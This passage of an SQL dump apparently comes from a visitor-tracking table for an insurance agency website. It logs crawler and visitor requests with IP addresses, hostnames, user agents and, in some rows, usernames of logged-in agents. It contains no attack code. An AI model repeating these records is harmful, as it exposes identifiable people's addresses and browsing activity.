+http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17207,'0b_245fe0bbfbe9f6a40327d52a8fb63783','1460582111','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(17210,'0b_245fe0bbfbe9f6a40327d52a8fb63783','1460582117','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(17213,'0b_eb255386096da1d97b99e073b35fe088','1460582332','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(17214,'0b_8e4ee4ab79338c0ca8e47d1d7c2f6c60','1460583171','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(17216,'0b_8e4ee4ab79338c0ca8e47d1d7c2f6c60','1460583173','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(17219,'0b_9e6a56cb4ce6892414581a6a713f5e40','1460584436','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17220,'0b_9e6a56cb4ce6892414581a6a713f5e40','1460584437','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17223,'0b_9e6a56cb4ce6892414581a6a713f5e40','1460584658','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17226,'0b_9e6a56cb4ce6892414581a6a713f5e40','1460584659','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17228,'0b_b00a03076eaf29d6b175fd1b267b6a74','1460584912','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(17231,'0b_b00a03076eaf29d6b175fd1b267b6a74','1460584913','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(17234,'0b_673804581f0ae6bab7b11d7a150d1e7a','1460587931','51.255.51.67','67.ip-51-255-51.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(17235,'0b_673804581f0ae6bab7b11d7a150d1e7a','1460587937','51.255.51.67','67.ip-51-255-51.eu','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(17237,'0b_673804581f0ae6bab7b11d7a150d1e7a','1460587943','51.255.51.67','67.ip-51-255-51.eu','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(17238,'0b_07acf8c4f9da5dda90c35b2e2a04b97e','1460592892','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17240,'0b_07acf8c4f9da5dda90c35b2e2a04b97e','1460592989','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17243,'0b_7ad005e5b799db2319fac7c3f8af0113','1460595270','66.249.75.89','crawl-66-249-75-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17244,'0b_bf3e77e03fa10628d6e7a0d4ca84d1a0','1460595271','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(17246,'0b_993db3a19771f070823a3e0e391dc56b','1460595336','136.243.5.87','static.87.5.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17247,'0b_993db3a19771f070823a3e0e391dc56b','1460595338','136.243.5.87','static.87.5.243.136.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17249,'0b_0180e39b8f6eb42e28aef9a6f705a191','1460601068','123.125.71.45','baiduspider-123-125-71-45.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(17252,'0b_0180e39b8f6eb42e28aef9a6f705a191','1460601151','123.125.71.25','baiduspider-123-125-71-25.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(17253,'0b_a3b72a5e83f4b2e93d71f9cb807bb199','1460602184','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17255,'0b_36b88486d6cd3cd24a51b8ee98e37b49','1460602278','107.173.191.55','107-173-191-55-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(17258,'0b_ea037e1ec1957dc67302ce4b438a391a','1460606261','208.90.57.196','nat-vlan550.las1.sco.cisco.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win8 x64','Firefox 31','','','','','','','','0','0',0),(17259,'0b_ea037e1ec1957dc67302ce4b438a391a','1460606268','208.90.57.196','nat-vlan550.las1.sco.cisco.com','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win8 x64','Firefox 31','','','','','','','','0','0',0),(17261,'0b_ea037e1ec1957dc67302ce4b438a391a','1460606274','208.90.57.196','nat-vlan550.las1.sco.cisco.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win8 x64','Firefox 31','','','','','','','','0','0',0),(17264,'0b_ea037e1ec1957dc67302ce4b438a391a','1460606275','208.90.57.196','nat-vlan550.las1.sco.cisco.com','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win8 x64','Firefox 31','','','','','','','','0','0',0),(17265,'0b_ea037e1ec1957dc67302ce4b438a391a','1460606287','208.90.57.196','nat-vlan550.las1.sco.cisco.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win8 x64','Firefox 31','','','','','','','','0','0',0),(17268,'0b_d9b4a2e59fd4ec3b62c652e7aee490b8','1460608600','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17271,'0b_d9b4a2e59fd4ec3b62c652e7aee490b8','1460608603','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17274,'0b_d9b4a2e59fd4ec3b62c652e7aee490b8','1460608606','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17276,'0b_d9b4a2e59fd4ec3b62c652e7aee490b8','1460608615','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(17279,'0b_d1e0667620e7cc9aa4329f3286c9cd78','1460610544','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17282,'0b_d1e0667620e7cc9aa4329f3286c9cd78','1460610545','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17285,'0b_d1e0667620e7cc9aa4329f3286c9cd78','1460610589','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17288,'0b_57b9674fba548ebaa2c03b493451c3d1','1460612464','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17289,'0b_57b9674fba548ebaa2c03b493451c3d1','1460612483','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17291,'0b_9699dca10a3245ac51793cdccbc57dfa','1460615189','107.169.10.3','107.169.10.3','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(17292,'0b_afcc4a3fc2e323be803662ad565492ec','1460617537','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(17294,'0b_afcc4a3fc2e323be803662ad565492ec','1460617541','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(17297,'0b_afcc4a3fc2e323be803662ad565492ec','1460617544','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(17300,'0b_afcc4a3fc2e323be803662ad565492ec','1460617548','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(17303,'0b_afcc4a3fc2e323be803662ad565492ec','1460617551','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(17306,'0b_afcc4a3fc2e323be803662ad565492ec','1460617554','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(17309,'0b_01a080e9890bb4dac1f6c7b7fa3dca22','1460621821','31.7.56.254','31.7.56.254','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinVista','Firefox 16','ua','','','','','','','0','0',0),(17310,'0b_7cdfca616439380d79474aea22cde2b4','1460622212','192.3.152.107','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(17312,'0b_8b5854ddd7f467bdd807d6456d42181a','1460624591','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17315,'0b_8b5854ddd7f467bdd807d6456d42181a','1460624598','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/top-ten-points-to-consider-when-coming-up-with-a/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17318,'0b_67bc1993243ae116c5f97c684133578c','1460626554','66.249.75.52','crawl-66-249-75-52.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17319,'0b_67bc1993243ae116c5f97c684133578c','1460626555','66.249.75.55','crawl-66-249-75-55.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17321,'0b_fc6aa0fe6d4781a675be2abe1b32f6e5','1460628871','66.249.75.89','crawl-66-249-75-89.googlebot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17322,'0b_ef9cae68682a0e48d318a865ffe5b4b9','1460631412','216.185.39.162','216.185.39.162','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(17324,'0b_ef9cae68682a0e48d318a865ffe5b4b9','1460631449','216.185.39.162','216.185.39.162','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17325,'0b_e87042f270a9bcb1a827c474decfbb56','1460631939','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17327,'0b_d60abababa09d0bf2f30d1fad2e6e27f','1460631953','79.143.180.15','mail.ruddog.eu','/','Wget/1.13.4 (linux-gnu)','','',0,'','Wget 1','eu','','','Wget','','','','0','0',0),(17330,'0b_8de06f007a7376b360b81cee4ba953af','1460633089','180.76.15.143','baiduspider-180-76-15-143.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(17331,'0b_f2de1d3d7bfd61aa411b0c1990b34af0','1460634861','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17333,'0b_594a5c999d74e607c9152fcf0030c8a7','1460637420','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(17334,'0b_49d571bcf6769d2c4feb3101cb806c0f','1460639301','180.76.15.22','baiduspider-180-76-15-22.crawl.baidu.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(17337,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460641277','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(17340,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460641279','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(17343,'0b_aa9044424adda3c5cd9e248af252edd0','1460641286','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(17345,'0b_aa9044424adda3c5cd9e248af252edd0','1460641287','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(17348,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460644284','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17349,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460645050','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17351,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460645666','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17352,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460645667','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17355,'0b_5e7ffe621c0a8c8dd472baec88909c4c','1460646339','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17358,'0b_5e7ffe621c0a8c8dd472baec88909c4c','1460646342','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17360,'0b_5e7ffe621c0a8c8dd472baec88909c4c','1460646344','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17363,'0b_5e7ffe621c0a8c8dd472baec88909c4c','1460646347','184.154.139.23','placeholder.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17366,'0b_5e7ffe621c0a8c8dd472baec88909c4c','1460646348','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17367,'0b_5e7ffe621c0a8c8dd472baec88909c4c','1460646351','184.154.139.23','placeholder.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17369,'0b_5e7ffe621c0a8c8dd472baec88909c4c','1460646353','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17372,'0b_6785e8143ded1625ae4872d84dbd8bf8','1460646412','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17373,'0b_6785e8143ded1625ae4872d84dbd8bf8','1460646413','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17375,'0b_6785e8143ded1625ae4872d84dbd8bf8','1460646417','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17378,'0b_6f3160b42d2f84e9c6ea3cd5b339bb9f','1460646420','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17379,'0b_14d3744832ee42fb0006a64fed419ced','1460646427','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(17381,'0b_14d3744832ee42fb0006a64fed419ced','1460646432','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17384,'0b_14d3744832ee42fb0006a64fed419ced','1460646436','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17385,'0b_6785e8143ded1625ae4872d84dbd8bf8','1460646445','67.85.210.17','ool-4355d211.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(17388,'0b_6785e8143ded1625ae4872d84dbd8bf8','1460646604','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(17391,'0b_af2e9c6bd34bc4a919376b22091a6faf','1460646720','66.249.64.24','crawl-66-249-64-24.googlebot.com','/register/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17394,'0b_14d3744832ee42fb0006a64fed419ced','1460646843','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17396,'0b_14d3744832ee42fb0006a64fed419ced','1460646849','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17397,'0b_af2e9c6bd34bc4a919376b22091a6faf','1460646886','66.249.64.24','crawl-66-249-64-24.googlebot.com','/agent-tools/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17399,'0b_14d3744832ee42fb0006a64fed419ced','1460647013','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17400,'0b_14d3744832ee42fb0006a64fed419ced','1460647017','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 